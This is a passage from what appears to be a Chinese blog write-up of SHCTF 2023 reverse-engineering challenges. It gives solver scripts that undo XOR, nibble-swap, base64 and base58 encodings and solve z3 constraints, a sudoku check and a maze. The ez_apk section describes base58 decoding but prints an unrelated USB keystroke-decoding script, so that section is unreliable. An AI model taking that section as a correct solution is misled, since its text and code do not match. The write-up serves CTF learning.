flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br> c = flag[i]<br> c = <span class="hljs-built_in">ord</span>(c)^<span class="hljs-number">0x1E</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br><br><br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure><span id="more"></span> <h3 id="WEEK1-easy-re"><a href="#WEEK1-easy-re" class="headerlink" title="[WEEK1]easy_re"></a>[WEEK1]easy_re</h3><p>他的加密算法就是把字符串的高位变到低位,地位变到高位而已,直接写代码进行替换</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python">des =[<br> <span class="hljs-number">0x66</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x76</span>, <span class="hljs-number">0xB7</span>, <span class="hljs-number">0x45</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x97</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x47</span>, <br> <span class="hljs-number">0x03</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x37</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x67</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x47</span>, <span class="hljs-number">0x86</span>, <br> <span class="hljs-number">0x56</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x96</span>, <span class="hljs-number">0xE6</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x97</span>, <span class="hljs-number">0xF5</span>, <span class="hljs-number">0x07</span>, <br> <span class="hljs-number">0x27</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0xC6</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xD6</span>, <span class="hljs-number">0xD7</span><br>]<br><br>result = <span class="hljs-string">""</span><br><br><span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> des:<br> high = (<span class="hljs-built_in">ord</span>(<span class="hljs-built_in">chr</span>(c)) & <span class="hljs-number">0xF0</span>) >> <span class="hljs-number">4</span><br> low = (<span class="hljs-built_in">ord</span>(<span class="hljs-built_in">chr</span>(c)) & <span class="hljs-number">0x0F</span>) << <span class="hljs-number">4</span><br> orig = high | low<br> <br> result += <span class="hljs-built_in">chr</span>(orig)<br><br><span class="hljs-built_in">print</span>(result)<br></code></pre></td></tr></table></figure><h3 id="WEEK1-seed"><a href="#WEEK1-seed" class="headerlink" title="[WEEK1]seed"></a>[WEEK1]seed</h3><p>IDA分析得知就是简单的通过伪随机数获取10个数,然后和flag进行异或,难点在于伪随机数为多少,我们动调后发现他的伪随机数是0</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><time.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> flag[<span class="hljs-number">50</span>];<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> key[<span class="hljs-number">10</span>];<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> des[<span class="hljs-number">45</span>] = {<br> <span class="hljs-number">0x40</span>, <span class="hljs-number">0x29</span>, <span class="hljs-number">0x28</span>, <span class="hljs-number">0xE9</span>, <span class="hljs-number">0xC2</span>, <span class="hljs-number">0x04</span>, <span class="hljs-number">0xA4</span>, <span class="hljs-number">0xED</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0x53</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0x3C</span>, <span class="hljs-number">0xD1</span>, <span class="hljs-number">0xCD</span>, <span class="hljs-number">0x2B</span>, <span class="hljs-number">0xA8</span>,<br> <span class="hljs-number">0xC4</span>, <span class="hljs-number">0x89</span>, <span class="hljs-number">0x69</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x21</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0xEF</span>, <span class="hljs-number">0xD7</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x92</span>, <span class="hljs-number">0xDF</span>, <span class="hljs-number">0xCA</span>, <span class="hljs-number">0x53</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x3C</span>, <span class="hljs-number">0xD1</span>,<br> <span class="hljs-number">0xCE</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0xA3</span>, <span class="hljs-number">0xEF</span>, <span class="hljs-number">0xA5</span>, <span class="hljs-number">0x78</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x1A</span>, <span class="hljs-number">0x2D</span>, <span class="hljs-number">0xE1</span>, <span class="hljs-number">0xC4</span><br> }; <span class="hljs-comment">// 密文</span><br><br> srand(<span class="hljs-number">0</span>); <span class="hljs-comment">// 设置随机种子为当前时间</span><br><br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">10</span>; i++) {<br> key[i] = rand() % <span class="hljs-number">255</span>; <span class="hljs-comment">// 随机生成key</span><br> }<br><br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">45</span>; i++) {<br> des[i] ^= key[i % <span class="hljs-number">10</span>]; <span class="hljs-comment">// 异或加密</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, des[i]);<br> }<br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-signin"><a href="#WEEK1-signin" class="headerlink" title="[WEEK1]signin"></a>[WEEK1]signin</h3><p>IDA打开后直接</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.zvde9hyzyog.png"></p><h3 id="WEEK1-easy-math"><a href="#WEEK1-easy-math" class="headerlink" title="[WEEK1]easy_math"></a>[WEEK1]easy_math</h3><p>直接z3约束求解即可</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># 创建一个符号变量数组l,包含6个整数变量</span><br>l = [Int(<span class="hljs-string">'l%d'</span> % i) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>)]<br><br><span class="hljs-comment"># 创建一个Z3求解器</span><br>solver = Solver()<br><br><span class="hljs-comment"># 添加方程组</span><br>solver.add(<br> (<span class="hljs-number">593</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">997</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">811</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">258</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">829</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">532</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x5b8e0aef71d34ff43</span>,<br> (<span class="hljs-number">605</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">686</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">328</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">602</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">695</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">576</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x551a262360964ef7f</span>,<br> (<span class="hljs-number">373</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">512</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">449</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">756</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">448</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">580</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x49d158a5657d6931c</span>,<br> (<span class="hljs-number">560</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">635</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">422</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">971</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">855</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">597</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x625568d5abbabf4f3</span>,<br> (<span class="hljs-number">717</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">507</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">388</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">925</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">324</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">524</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x50ee0c025e70e3c23</span>,<br> (<span class="hljs-number">312</span> * l[<span class="hljs-number">0</span>] + <span class="hljs-number">368</span> * l[<span class="hljs-number">1</span>] + <span class="hljs-number">884</span> * l[<span class="hljs-number">2</span>] + <span class="hljs-number">518</span> * l[<span class="hljs-number">3</span>] + <span class="hljs-number">495</span> * l[<span class="hljs-number">4</span>] + <span class="hljs-number">414</span> * l[<span class="hljs-number">5</span>]) == <span class="hljs-number">0x40e735f8aa2815f65</span><br>)<br><br><span class="hljs-comment"># 检查是否存在解</span><br><span class="hljs-keyword">if</span> solver.check() == sat:<br> model = solver.model()<br> result = [model[l[i]].as_long() <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>)]<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Solution found:"</span>)<br> <span class="hljs-built_in">print</span>(result)<br><span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"No solution found."</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">6</span>):<br> result[i]=<span class="hljs-built_in">hex</span>(result[i])<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(result[i][<span class="hljs-number">2</span>:][j*<span class="hljs-number">2</span>:j*<span class="hljs-number">2</span>+<span class="hljs-number">2</span>],<span class="hljs-number">16</span>)),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK1-ez-apk"><a href="#WEEK1-ez-apk" class="headerlink" title="[WEEK1]ez_apk"></a>[WEEK1]ez_apk</h3><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1p56go1mdb0g.png"></p><p>我们分析代码,发现了加密函数,这段时一个base58的码表转换,但最后直接给了加密后的码表</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.1t2a0v5wtabk.webp"></p><p>我们在mainactivity中点击smail代码,找到原始数据,直接base58换表解密即可</p><p>x mappings = { 0x04:”A”, 0x05:”B”, 0x06:”C”, 0x07:”D”, 0x08:”E”, 0x09:”F”, 0x0A:”G”, 0x0B:”H”, 0x0C:”I”, 0x0D:”J”, 0x0E:”K”, 0x0F:”L”, 0x10:”M”, 0x11:”N”,0x12:”O”, 0x13:”P”, 0x14:”Q”, 0x15:”R”, 0x16:”S”, 0x17:”T”, 0x18:”U”,0x19:”V”, 0x1A:”W”, 0x1B:”X”, 0x1C:”Y”, 0x1D:”Z”, 0x1E:”1”, 0x1F:”2”, 0x20:”3”, 0x21:”4”, 0x22:”5”, 0x23:”6”, 0x24:”7”, 0x25:”8”, 0x26:”9”, 0x27:”0”, 0x28:”\n”, 0x2a:”[DEL]”, 0X2B:” “, 0x2C:” “, 0x2D:”-“, 0x2E:”=”, 0x2F:”[“, 0x30:”]”, 0x31:”\“, 0x32:”~”, 0x33:”;”, 0x34:”‘“, 0x36:”,”, 0x37:”.” }nums = []keys = open(‘usbdata.txt’)for line in keys: if line[0]!=’0’ or line[1]!=’0’ or line[3]!=’0’ or line[4]!=’0’ or line[9]!=’0’ or line[10]!=’0’ or line[12]!=’0’ or line[13]!=’0’ or line[15]!=’0’ or line[16]!=’0’ or line[18]!=’0’ or line[19]!=’0’ or line[21]!=’0’ or line[22]!=’0’: continue nums.append(int(line[6:8],16))keys.close()output = “”for n in nums: if n == 0 : continue if n in mappings: output += mappings[n] else: output += ‘[unknown]’print(‘output :\n’ + output)# output :# SEC2ETK3YPython</p><h3 id="WEEK2-pycode"><a href="#WEEK2-pycode" class="headerlink" title="[WEEK2]pycode"></a>[WEEK2]pycode</h3><p>直接gpt将py字节码转换成普通的代码形式</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br>flag = <span class="hljs-string">'*******************'</span><br>value = <span class="hljs-string">''</span><br>output = <span class="hljs-string">''</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> w = <span class="hljs-number">1024</span><br> x = w % <span class="hljs-number">3</span><br> y = w // <span class="hljs-number">9</span><br> z = x * y<br> w -= z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br> w = <span class="hljs-number">20</span><br> x = w % <span class="hljs-number">6</span><br> y = w // <span class="hljs-number">3</span><br> z = x * y<br> w += z<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> w = <span class="hljs-number">1024</span><br> x = w % <span class="hljs-number">3</span><br> y = w // <span class="hljs-number">9</span> <br> z = x * y<br> w -= z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10000</span>):<br> w = <span class="hljs-number">20</span><br> x = w % <span class="hljs-number">6</span><br> y = w // <span class="hljs-number">3</span><br> z = x * y <br> w += z<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> temp = flag[i]<br> temp = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(temp) ^ <span class="hljs-number">8</span>)<br> value += temp<br> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> temp = value[i]<br> temp = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(temp) + <span class="hljs-number">3</span>)<br> output += temp<br> <br>obfuscated_output = base64.b64encode(output.encode()).decode()<br>obfuscated_output = obfuscated_output[:-<span class="hljs-number">1</span>]<br>obfuscated_output = obfuscated_output.replace(<span class="hljs-string">'0'</span>, <span class="hljs-string">'t'</span>)<br>obfuscated_output = obfuscated_output.replace(<span class="hljs-string">'c'</span>, <span class="hljs-string">'4'</span>)<br>obfuscated_output = obfuscated_output.replace(<span class="hljs-string">'+'</span>, <span class="hljs-string">'-'</span>)<br><span class="hljs-built_in">print</span>(obfuscated_output)<br></code></pre></td></tr></table></figure><p>我们可以看到前面基本都是混淆的,我们只需要从后往前慢慢还原就好了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br>a=<span class="hljs-string">'==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4'</span><br><br>a=a.replace(<span class="hljs-string">'t'</span>,<span class="hljs-string">'0'</span>)<br>a=a.replace(<span class="hljs-string">'4'</span>,<span class="hljs-string">'c'</span>)<br>a=a.replace(<span class="hljs-string">'-'</span>,<span class="hljs-string">'+'</span>)<br><br>a=a[::-<span class="hljs-number">1</span>]<br>a=base64.decodebytes(a.encode(<span class="hljs-string">'utf-8'</span>))<br>a=a.decode(<span class="hljs-string">'utf-8'</span>)<br>a=<span class="hljs-built_in">list</span>(a)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=(<span class="hljs-built_in">ord</span>(a[i])-<span class="hljs-number">3</span>)^<span class="hljs-number">8</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK2-Authur’s-box"><a href="#WEEK2-Authur’s-box" class="headerlink" title="[WEEK2]Authur’s_box"></a>[WEEK2]Authur’s_box</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">a=[<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xA7</span>,<span class="hljs-number">0xAA</span>,<span class="hljs-number">0xAC</span>,<span class="hljs-number">0xB0</span>,<span class="hljs-number">0xF8</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xAF</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xF3</span>,<span class="hljs-number">0xA9</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xFE</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xFC</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xA9</span>,<span class="hljs-number">0xFD</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xF9</span>,<span class="hljs-number">0xE6</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xF2</span>,<span class="hljs-number">0xA8</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xFD</span>,<span class="hljs-number">0xF3</span>,<span class="hljs-number">0xAF</span>,<span class="hljs-number">0xF3</span>,<span class="hljs-number">0xAD</span>,<span class="hljs-number">0xFA</span>,<span class="hljs-number">0xB0</span>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=a[i]^<span class="hljs-number">0xcb</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK2-签到题?"><a href="#WEEK2-签到题?" class="headerlink" title="[WEEK2]签到题?"></a>[WEEK2]签到题?</h3><p>这个题做的我有点懵逼,该说不说确实是签到</p><p>直接动调取值,取出值后直接base64解密就得出flag了</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031124243081.png" alt="image-20231031124243081"></p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031124515480.png" alt="image-20231031124515480"></p><h3 id="WEEK2-not-gcc"><a href="#WEEK2-not-gcc" class="headerlink" title="[WEEK2]not gcc"></a>[WEEK2]not gcc</h3><p><a href="https://blog.csdn.net/pc153262603/article/details/89553688">clang llc llvm 常用编译指令-CSDN博客</a></p><p><a href="https://www.cnblogs.com/ren-ctfnote/p/14948764.html">2021CISCN-逆向-baby.bc-部分知识点总结 - re0juren - 博客园 (cnblogs.com)</a></p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">clang <span class="hljs-keyword">baby.bc </span>-o <span class="hljs-keyword">baby</span><br></code></pre></td></tr></table></figure><p>直接用命令把.bc文件编译成可执行文件,然后开始操作。分析代码</p><p>我们分析代码发现关键函数是sudoku函数,代码逻辑就是我们输入正确的81位数独的值,然后他把他提供的数独的值置为0,然后把未知的置为我们求出来的数独的值(有点绕)</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">Sudoku</span><span class="hljs-params">(<span class="hljs-type">char</span> *a1)</span><br>{<br> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-1Ch]</span><br> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+Ch] [rbp-18h]</span><br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+10h] [rbp-14h]</span><br><br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < <span class="hljs-number">9</span>; ++i )<br> {<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; j < <span class="hljs-number">9</span>; ++j )<br> {<br> v2 = *a1;<br> <span class="hljs-keyword">if</span> ( <span class="hljs-built_in">map</span>[<span class="hljs-number">9</span> * i + j] )<br> {<br> <span class="hljs-keyword">if</span> ( v2 != <span class="hljs-number">48</span> )<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">map</span>[<span class="hljs-number">9</span> * i + j] = v2;<br> }<br> }<br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>}<br><br></code></pre></td></tr></table></figure><p>是个数独的题目,我们提取map里的值,然后去在线解数独的网站进行解密,然后我们分析上述的代码逻辑,根据他的代码逻辑对我们原本的map的值进行修改,就是最后我们要输出的答案</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031125334209.png" alt="image-20231031125334209"></p><p>那么我们直接异或就可以了,相同的值异或是0,不同的值异或0也是原本的值</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><br>a=<span class="hljs-string">"407003208500020900012980004709104800061000470003270006086300040020740630304002000"</span><br>b=<span class="hljs-string">"497513268538426917612987354759164823261839475843275196986351742125748639374692581"</span><br>c=<span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> c+=<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(a[i])^<span class="hljs-built_in">int</span>(b[i]))<br> <span class="hljs-comment"># print(int(a[i])^int(b[i]),end='')</span><br><span class="hljs-comment"># print(c)</span><br><span class="hljs-comment"># 090510060038406017600007350050060023200839005840005190900051702105008009070690581</span><br>d=hashlib.md5()<br>d.update(<span class="hljs-string">b'090510060038406017600007350050060023200839005840005190900051702105008009070690581'</span>)<br><span class="hljs-built_in">print</span>(d.hexdigest())<br></code></pre></td></tr></table></figure><h3 id="WEEK2-Run-润!"><a href="#WEEK2-Run-润!" class="headerlink" title="[WEEK2]Run?润!"></a>[WEEK2]Run?润!</h3><p>迷宫题目,学习了一下数据结构中的DFS和BFS算法,提供地图一键解出路径,学习了如何调试出地图</p><p><a href="https://mp.weixin.qq.com/s/T6ML7zwA57JXTRwOZqcxhw?spm=a2c6h.12873639.article-detail.7.19f31041PU5YhX">微信公众平台 (qq.com)</a></p><p><a href="https://blog.csdn.net/Sciurdae/article/details/133963882">CTF-Reverse 迷宫地图类题目分析‘‘DFS和BFS算法‘‘(学习笔记)【详】-CSDN博客</a></p><p><a href="https://blog.csdn.net/Sciurdae/article/details/133964592">SHCTF2023 山河CTF Reverse方向week2全WP【详解】-CSDN博客</a></p><p>分析代码,我们看到sub_401A26();就是我们的地图生成函数,我们看到他的调用情况,最一开始调用了一次,然后后续的走迷宫的过程中又生成了一次</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c">_DWORD *<span class="hljs-title function_">sub_401A26</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> v0; <span class="hljs-comment">// eax</span><br> __int64 v1; <span class="hljs-comment">// rdx</span><br> _DWORD *result; <span class="hljs-comment">// rax</span><br> <span class="hljs-type">int</span> j; <span class="hljs-comment">// [rsp+4h] [rbp-Ch]</span><br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+8h] [rbp-8h]</span><br> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [rsp+Ch] [rbp-4h]</span><br><br> v5 = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span 